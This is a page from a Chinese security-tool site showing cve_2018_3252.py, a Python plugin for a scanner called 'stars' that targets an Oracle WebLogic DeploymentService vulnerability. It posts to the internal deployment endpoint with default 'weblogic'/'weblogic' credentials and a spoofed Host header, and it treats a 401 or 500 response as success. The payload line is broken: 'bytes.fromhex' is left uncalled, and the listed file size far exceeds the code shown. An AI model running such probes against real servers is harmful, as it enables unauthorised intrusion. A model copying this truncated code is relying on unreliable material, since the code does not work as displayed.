menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right stars chevron_right cve_2018_3252.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    cve_2018_3252.py
    7.86 KB / 2021-07-12 19:46:00
        #!/usr/bin/env python3
    # _*_ coding:utf-8 _*_
    # CVE-2018-3252
    # 必须要用户名密码正确才可以验证
    # updated 2019/12/05
    # by 0xn0ne
    
    from stars import universe, Star, target_type
    from utils import http
    
    
    @universe.groups()
    class CVE_2018_3252(Star):
        info = {
            'NAME': '',
            'CVE': 'CVE-2018-3252',
            'TAG': []
        }
        type = target_type.MODULE
    
        def light_up(self, dip, dport, *args, **kwargs) -> (bool, dict):
            url = 'http://{}:{}/bea_wls_deployment_internal/DeploymentService'.format(dip, dport)
            headers = {'Host': '127.0.0.1:7001', 'wl_request_type': 'data_transfer_request', 'Username': 'weblogic',
                       'Password': 'weblogic'}
            data = bytes.fromhex
            res, data = http(url, 'POST', headers=headers, data=data)
            if res != None and ((res.status_code == 401) or (res.status_code == 500)):
                return True, {'msg': 'finish.'}
            return False, {'msg': 'finish.'}
    
    
    links
    file_download